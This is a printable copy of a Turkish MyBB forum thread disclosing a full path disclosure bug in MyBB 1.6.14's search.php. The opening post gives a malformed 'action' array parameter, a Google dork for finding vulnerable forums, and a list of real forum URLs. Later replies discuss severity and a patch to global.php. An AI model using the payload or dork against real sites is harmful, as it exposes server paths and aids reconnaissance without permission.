MyBB Depo Forum
MyBB 1.6.14 - search.php Full Path Disclosure - Baskı Önizleme

+- MyBB Depo Forum (https://mybbdepo.com)
+-- Forum: MyBB Genel Depo (https://mybbdepo.com/mybb-genel-depo-forumu)
+--- Forum: MyBB Güvenlik (https://mybbdepo.com/mybb-guvenlik-forumu)
+--- Konu Başlığı: MyBB 1.6.14 - search.php Full Path Disclosure (/mybb-1-6-14-search-php-full-path-disclosure-konusu.html)

Sayfalar: 1 2


MyBB 1.6.14 - search.php Full Path Disclosure - DemoLisH - 29-07-2014

Açık bana aittir arkadaşlar. MyBB yetkililerine bildirdiğimde cevapları şu oldu " It's just a bug, a low priority one, and one we've known about for a long time. " Gülümseme

http://cxsecurity.com/issue/WLB-2014070152

Kod:
# Title: MyBB 1.6.14 - search.php Bug
# Google Dork: inurl:"search.php" intext:"Powered By MyBB"
# Date: 26.07.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.6.14 - Latest Version
# Contact: [email protected]

***************************************************

[~#~] Exploit:
search.php?action[$victor]=getdaily

[~#~] Demo:
http://community.mybb.com/search.php?action[$victor]=getdaily

[~#~] Error:
Warning [2] Illegal offset type in isset or empty - Line: 239 - File: global.php PHP 5.4.28-1~dotdeb.1 (Linux)

[~#~] Example:
http://my-bb.ir/search.php?action[$victor=getdaily
http://www.mybb.fr/search.php?action[$victor]=getdaily
http://community.mybb.vn/search.php?action[$victor]=getdaily
http://destek.mybb.com.tr/search.php?action[$victor]=getdaily
http://www.mybb.biz/search.php?action[$victor]=getdaily
http://mybb.co.il/forum/search.php?action[$victor]=getdaily

***************************************************

[~#~] Thanks To:
ynR !, T3kfurD4GLi, X-X-X, PoseidonKairos, Mugair and all TurkeySecurity.Org & B3yaz.Org Members.



Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - xpserkan - 29-07-2014

Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - DemoLisH - 29-07-2014

(29-07-2014, Saat:15:31)xpserkan Adlı Kullanıcıdan Alıntı: Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.

Hocam onu bende farkettim ama itibar kaybetmemeleri için bildirdim insan bi teşekkür ederdi sanırım herkez Türkler kadar nazik olamıyor Gülümseme


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - EmreKarakaya - 29-07-2014

Bildirim için teşekkürler.Bu sıralar Mybb de Search.php dosyası fazla buglu gibi


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - xpserkan - 29-07-2014

(29-07-2014, Saat:17:37)DemoLisH Adlı Kullanıcıdan Alıntı:
(29-07-2014, Saat:15:31)xpserkan Adlı Kullanıcıdan Alıntı: Doğru söylemişler size, Bu açık değil gözden kaçırılan düşük ölçekli bir bug/hata.
Yani korkulacak ciddi bir sorun değil, bununla anca hata sayfasına ulaşırlar, başka hiçbir işlem yapamazlar.
Bu arada bildiri için teşekkürler.

Hocam onu bende farkettim ama itibar kaybetmemeleri için bildirdim insan bi teşekkür ederdi sanırım herkez Türkler kadar nazik olamıyor Gülümseme

Eskiye dayalı yaşanan olaylardan dolayı Türkleri pek sevmiyorlar desek doğru olacaktır. Bize karşı güven ve sevgileri geçmişten dolayı kırılıp yok oldu malesef. Bazı şeyleri hak verip kabullenmek lazım.


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - usameavci - 29-07-2014

Nedense bildirilen bugların hepsi dizi hatası Gülümseme Get ile gelen değerlerin hepsini is_array() methodundan geçirmek bu kadar mı zor diyesim var, ama demiyorum. Umarım şu ufak tefek kontrol hatalarını giderirler de bu tr konular açılmaz artık Melek - Masum


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - devmybb - 30-07-2014

İçerik temizlendi..


Cvp: MyBB 1.6.14 - search.php Full Path Disclosure - xpserkan - 30-07-2014

(30-07-2014, Saat:00:54)devmybb Adlı Kullanıcıdan Alıntı: Bu hatalar önemli olmadığından 1.6x versiyonlarda düzeltme yoluna gitmiyorlar. Bu hataların hiç biri 1.8 de yok.

Hatayı ortadan kaldırmak isteyenler global.php içinden hata veren satırı değiştirince hatayı önlemiş olurlar.
Bul: Satır 229
Kod:
$stylesheet_actions[] = $mybb->input['action'];

Değiştir:
Kod:
$stylesheet_actions[] = $mybb->get_input('action');

Hocam hatayı bu şekilde giderince üye profilleri açılmıyor. Sanırım siz 1.8 global.php dosyasına bakarak bu kodu verdiniz fakat, sadece global.php ile düzenleme yaparak bu sorun giderilmiyor.

1.8 .php dosyalarındaki Kodlara baktığımız zaman, search.php ve inc/functions_search.php dosyalarında da işlem yapılması gerektiğini görüyorum.